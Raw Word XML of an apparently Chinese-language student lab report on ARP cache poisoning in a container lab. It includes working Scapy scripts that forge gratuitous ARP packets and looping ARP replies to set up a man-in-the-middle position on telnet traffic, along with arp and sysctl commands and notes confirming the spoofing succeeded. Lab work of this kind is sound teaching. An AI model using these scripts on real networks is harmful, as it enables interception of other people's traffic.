                      <wp:docPr id="1525924322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23641" cy="2151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26" o:spt="1" style="position:absolute;left:0pt;margin-left:6.35pt;margin-top:115.6pt;height:16.95pt;width:214.45pt;z-index:251665408;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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OPu0NrWAAAACgEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3du&#10;cmV2LnhtbFBLAQIUABQAAAAIAIdO4kCa5UUScwIAANQEAAAOAAAAAAAAAAEAIAAAACU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76495" cy="1600835"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="5756644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6444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79" cy="16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AFC7D">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4893945" cy="869315"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
                  <wp:docPr id="15091280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12800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765" cy="871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F8D3D"/>
          <w:p w14:paraId="090D7625">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果分析：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66A72AA8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1.步骤 3: 在 A 上，ARP 缓存包含 B 的正确 MAC 地址。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="361C65CB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.步骤 6: 运行 arp.py 后，A 的 ARP 缓存中的 10.9.0.6 的 MAC 地址被更改为 M 的 MAC 地址。因为我发送了伪造的 ARP 回复报文。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A187B61">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.步骤 5 和 9: 在 Wireshark 捕获中，看到伪造的 ARP 回复报文。数据包的源 MAC 地址是 M 的 MAC 地址，目标 MAC 地址是 A 的 MAC 地址。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18422197">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4.步骤 7: 删除 ARP 缓存后，A 需要重新解析 B 的 IP 地址，以更新其 ARP 表。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CAC8314">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>5.步骤 8 和 10: 再次运行 arp.py 后，能看到 A 的 ARP 缓存中 10.9.0.6 的 MAC 地址被伪造的 MAC 地址所替代。ARP 欺骗成功！</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50D796AE"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1FCB87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9BC62F4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任务：按照任务书要求使用ARP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> gratuitous</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>报文分别在ARPCache中有相应表项和没有相应表项的情况下进行ARP攻击，</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B2D315D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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="030BE7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23C878E7">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="178C8644">
            <w:pPr>
              <w:pStyle w:val="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修改arp.py:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E289E8C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#!/usr/bin/python3 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="275740B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from scapy.all import * </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5959AC6D">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6038C18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A_ip = "10.9.0.5"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C65B33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A_mac = "02:42:0a:09:00:05"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6498DD8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B_ip = "10.9.0.6"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5778809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B_mac = "02:42:0a:09:00:06"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44EA82F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M_ip = "10.9.0.105"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73B0051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M_mac = "02:42:0a:09:00:69"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42C033C0">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="628E11E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eth = Ether(src=M_mac,dst='ff:ff:ff:ff:ff:ff') </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F51E43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arp = ARP(hwsrc=M_mac, psrc=B_ip,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03AD2A9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hwdst='ff:ff:ff:ff:ff:ff', pdst=B_ip,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25487CA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op=1) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E33F00">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70F4DA8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pkt = eth / arp </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C3B3EA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sendp(pkt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01945D94">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.在B上ping A：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33D6ABD1"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ping 10.9.0.5 -c 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D8A3B7B">
            <w:pPr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在A上查看：arp -n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B18B8C2">
            <w:pPr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在M上运行arp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E74CF2F">
            <w:pPr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用wireshark抓包</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="323CF659">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr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在A上查看：arp -n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67C3779E">
            <w:pPr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删除A中关于B的记录：arp -d 10.9.0.6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D0C695">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr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再次在M上运行：arp,py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="745F2854">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr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用wireshark抓包</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E0864B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr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查看A：arp -n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4075A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6DF86498">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="532FC7B0">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5015865" cy="1619885"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2133489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4891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45" cy="162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C82FC">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>抓包显示：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DE0C1A3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074285" cy="475615"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:docPr id="12557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736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66" cy="47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BC0FC">
            <w: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581660</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4947285" cy="381635"/>
                      <wp:effectExtent l="0" t="0" r="24765" b="19050"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1042776521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47601" cy="3814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o:spt="1" style="position:absolute;left:0pt;margin-left:1.75pt;margin-top:45.8pt;height:30.05pt;width:389.55pt;z-index:251666432;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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+EOM9NYAAAAIAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25y&#10;ZXYueG1sUEsBAhQAFAAAAAgAh07iQF0DEQ1yAgAA1AQAAA4AAAAAAAAAAQAgAAAAJQEAAGRycy9l&#10;Mm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAAk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859655" cy="1199515"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:docPr id="3855114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51149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082" cy="120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F5A00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08550" cy="845185"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="10059323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323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392" cy="84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EF400">
            <w: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756285</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4048760" cy="174625"/>
                      <wp:effectExtent l="0" t="0" r="27940" b="16510"/>
                      <wp:wrapNone/>
                      <wp:docPr id="956701538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8787" cy="1745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9" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:10.6pt;margin-top:59.55pt;height:13.75pt;width:318.8pt;z-index:251667456;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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s9fX61gAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93&#10;bnJldi54bWxQSwECFAAUAAAACACHTuJACEFGMXQCAADTBAAADgAAAAAAAAABACAAAAAlAQAAZHJz&#10;L2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAACw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069840" cy="873760"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:docPr id="1383110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11016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666" cy="87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746FC">
            <w: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2990215</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>533400</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1652905" cy="259080"/>
                      <wp:effectExtent l="0" t="0" r="24130" b="26670"/>
                      <wp:wrapNone/>
                      <wp:docPr id="722841024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2766" cy="2591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1" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:235.45pt;margin-top:42pt;height:20.4pt;width:130.15pt;z-index:251668480;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Ka9WINcAAAAKAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rv&#10;d25yZXYueG1sUEsBAhQAFAAAAAgAh07iQL7D+yl0AgAA1AQAAA4AAAAAAAAAAQAgAAAAJgEAAGRy&#10;cy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAAw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064760" cy="1262380"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="83826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26800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496" cy="126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6A42A">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5084445" cy="324485"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                  <wp:docPr id="20491673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1673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789" cy="32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4E25A">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4972050" cy="893445"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                  <wp:docPr id="19100569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05694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894" cy="89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D0784">
            <w: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873760</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="3965575" cy="175895"/>
                      <wp:effectExtent l="0" t="0" r="15875" b="14605"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1343380277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5660" cy="176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2" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:9.45pt;margin-top:68.8pt;height:13.85pt;width:312.25pt;z-index:251669504;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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KvQ6LNcAAAAKAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rv&#10;d25yZXYueG1sUEsBAhQAFAAAAAgAh07iQH/WGN10AgAA1QQAAA4AAAAAAAAAAQAgAAAAJgEAAGRy&#10;cy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAAw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780915" cy="985520"/>
                  <wp:effectExtent l="0" t="0" r="635" b="5080"/>
                  <wp:docPr id="6989366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9366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823" cy="98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8418D">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5069840" cy="937260"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1561672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6727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15" cy="9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5E6"/>
          <w:p w14:paraId="729C89DB">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果分析：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DA0CA17">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1.步骤 3: 在 A 上，ARP 缓存包含 B 的正确 MAC 地址。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B7CC0C9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.步骤 6: 运行 arp.py 后，A 的 ARP 缓存中的 10.9.0.6 的 MAC 地址被 M 的 MAC 地址更新。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57D71FAC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.步骤 5 和 9: 在 Wireshark 捕获中，看到伪造的 ARP Gratuitous 报文。数据包的源 MAC 地址是 M 的 MAC 地址，目标 MAC 地址是广播地址（ff:ff:ff:ff:ff:ff）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72E6DDDA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4.步骤 7: 删除 ARP 缓存后，A 需要重新解析 B 的 IP 地址。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AB3028C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>5.步骤 8 和 10: 再次运行 arp.py 后，A 的 ARP 缓存中的 10.9.0.6 的 MAC 地址被伪造的 MAC 地址更新。ARP 欺骗成功！</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D1DA197">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74CD160A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Task 2: MITM Attack on Telnet using ARP Cache Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F04A7">
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="610" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4624705" cy="2494915"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:docPr id="643779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927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0476" cy="24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7724E4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AD364F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任务：按要求关闭路由转发功能对telnet通信双方发起ARP攻击，观察执行结果并进行说明</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AD4F76E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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0D5A90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2C58B3C1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42FDCB32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修改程序arp.py：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077AA64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#!/usr/bin/python3 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="074977C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from scapy.all import * </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2885483E">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C312D6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A_ip = "10.9.0.5"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A832DF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A_mac = "02:42:0a:09:00:05"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40B4560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B_ip = "10.9.0.6"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6155FDAC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B_mac = "02:42:0a:09:00:06"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AF19E3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M_ip = "10.9.0.105"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="625002B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M_mac = "02:42:0a:09:00:69"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32860D8A">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5BC22AC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ethA = Ether(src=M_mac,dst=A_mac) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42F08869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arpA = ARP(hwsrc=M_mac, psrc=B_ip,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20ADF5B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hwdst=A_mac, pdst=A_ip,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CB94C7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op=2) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BB683C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ethB = Ether(src=M_mac,dst=B_mac) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23E99B3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arpB = ARP(hwsrc=M_mac, psrc=A_ip,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53F482F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hwdst=A_mac, pdst=B_ip,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6652275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op=2) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78BBD8A5">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="597319F1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while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FB710E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pktA = ethA / arpA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D0FA23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sendp(pktA, count=1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BCFECD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pktB = ethB / arpB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72BD65B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sendp(pktB, count=1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07986727">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>time.sleep(5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B1720F4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从B ping到A：ping 10.9.0.5 -c 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5478A6BD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查看A：arp -n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79CE2964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在M上运行arp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608C612B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查看A和B：arp -n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CD3F360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在M上关闭转发：sysctl net.ipv4.ip_forward=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16EC06CF">
            <w:pPr>
              <w:pStyle w:val="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在M上运行arp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D512739">
            <w:pPr>
              <w:pStyle w:val="9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A ping B：ping 10.9.0.6 -c 1 ，B ping A: ping 10.9.0.5 -c 1，观察情况。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7590EC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E5C50E6">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CDE1911">
            <w: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440055</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="5012055" cy="367030"/>
                      <wp:effectExtent l="0" t="0" r="17145" b="14605"/>
                      <wp:wrapNone/>
                      <wp:docPr id="3661111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2086" cy="3667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3" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:-0.15pt;margin-top:34.65pt;height:28.9pt;width:394.65pt;z-index:251670528;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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q+YqF1QAAAAgBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54&#10;bWxQSwECFAAUAAAACACHTuJAIJq/mG8CAADSBAAADgAAAAAAAAABACAAAAAkAQAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwUGAAAAAAYABgBZAQAABQ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61890" cy="1601470"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="11564724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4724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569" cy="160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FC5FC">
            <w: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544195</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4977765" cy="332740"/>
                      <wp:effectExtent l="0" t="0" r="13335" b="10795"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1292921356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77856" cy="332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4" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:-0.9pt;margin-top:42.85pt;height:26.2pt;width:391.95pt;z-index:251671552;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Fft2rWAAAACQEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3du&#10;cmV2LnhtbFBLAQIUABQAAAAIAIdO4kB8kmH8cwIAANUEAAAOAAAAAAAAAAEAIAAAACU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23155" cy="1122045"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                  <wp:docPr id="1837875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75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590" cy="1123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5B9A2">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4693285" cy="3022600"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="3558434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4349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897" cy="302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6555F">
            <w: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2809240</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>593725</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1760220" cy="259080"/>
                      <wp:effectExtent l="0" t="0" r="11430" b="26670"/>
                      <wp:wrapNone/>
                      <wp:docPr id="698690718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0342" cy="2591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5" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:221.2pt;margin-top:46.75pt;height:20.4pt;width:138.6pt;z-index:251672576;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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6Q9ga9cAAAAKAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rv&#10;d25yZXYueG1sUEsBAhQAFAAAAAgAh07iQAeG2V10AgAA1AQAAA4AAAAAAAAAAQAgAAAAJgEAAGRy&#10;cy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAAw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854575" cy="1283970"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                  <wp:docPr id="750297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29720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52" cy="128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5B115">
            <w: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2892425</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>546735</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1691640" cy="298450"/>
                      <wp:effectExtent l="0" t="0" r="22860" b="26035"/>
                      <wp:wrapNone/>
                      <wp:docPr id="775549891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1885" cy="2982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6" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:227.75pt;margin-top:43.05pt;height:23.5pt;width:133.2pt;z-index:251673600;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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O5LhdcAAAAKAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rv&#10;d25yZXYueG1sUEsBAhQAFAAAAAgAh07iQD2BxEx0AgAA1AQAAA4AAAAAAAAAAQAgAAAAJgEAAGRy&#10;cy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAAw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12995" cy="907415"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
                  <wp:docPr id="1861632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6327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526" cy="90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684AA">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4820285" cy="1428750"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="6609738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9738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59" cy="143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F4D3F">
            <w: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2032000</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>733425</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2743200" cy="210185"/>
                      <wp:effectExtent l="0" t="0" r="19050" b="18415"/>
                      <wp:wrapNone/>
                      <wp:docPr id="522811572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2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7" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:160pt;margin-top:57.75pt;height:16.55pt;width:216pt;z-index:251674624;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Gxpb21gAAAAsBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJl&#10;di54bWxQSwECFAAUAAAACACHTuJAMVFkPHECAADUBAAADgAAAAAAAAABACAAAAAlAQAAZHJzL2Uy&#10;b0RvYy54bWxQSwUGAAAAAAYABgBZAQAACA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015865" cy="1172210"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                  <wp:docPr id="15532604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2604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285" cy="117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8BE7F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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2012315</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>687705</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2611120" cy="254000"/>
                      <wp:effectExtent l="0" t="0" r="17780" b="12700"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1063414609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174" cy="2542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8" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:158.45pt;margin-top:54.15pt;height:20pt;width:205.6pt;z-index:251675648;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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NekmFLXAAAACwEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9k&#10;b3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kDsnRrmdQIAANUEAAAOAAAAAAAAAAEAIAAAACYBAABk&#10;cnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAAAN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27600" cy="1137920"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="5080"/>
                  <wp:docPr id="19610207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0207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761" cy="114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38B8E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4532F2F">
            <w:r>
              <w:rPr>
